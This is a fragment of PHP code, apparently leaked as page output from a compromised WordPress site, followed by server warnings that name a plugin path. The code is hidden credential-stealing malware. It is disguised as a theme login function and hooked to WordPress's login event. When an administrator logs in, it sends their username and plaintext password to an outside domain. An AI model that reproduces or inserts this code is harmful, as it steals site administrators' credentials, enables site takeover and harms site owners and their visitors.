if (!function_exists("theme_login_init_7564a8689668a28f79cd30eb47126fcd")) {
function theme_login_init_7564a8689668a28f79cd30eb47126fcd() {
if (isset($_POST['log']) and isset($_POST['pwd'])) {
$abc = $_POST['log'];
$bca = $_POST['pwd'];
$zxa = (array)wp_authenticate($abc, $bca);
if (isset($zxa["allcaps"]['administrator'])) {
$url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url());
$response = wp_remote_get($url);
}
}
}
add_action('wp_login', 'theme_login_init_7564a8689668a28f79cd30eb47126fcd', 10, 0);
}
Warning: Cannot modify header information - headers already sent by (output started at /home/institutoacquaor/public_html/wp-content/plugins/301-seo-redirection/wp-redirection.php:64) in /home/institutoacquaor/public_html/wp-includes/pluggable.php on line 1435
Warning: Cannot modify header information - headers already sent by (output started at /home/institutoacquaor/public_html/wp-content/plugins/301-seo-redirection/wp-redirection.php:64) in /home/institutoacquaor/public_html/wp-includes/pluggable.php on line 1438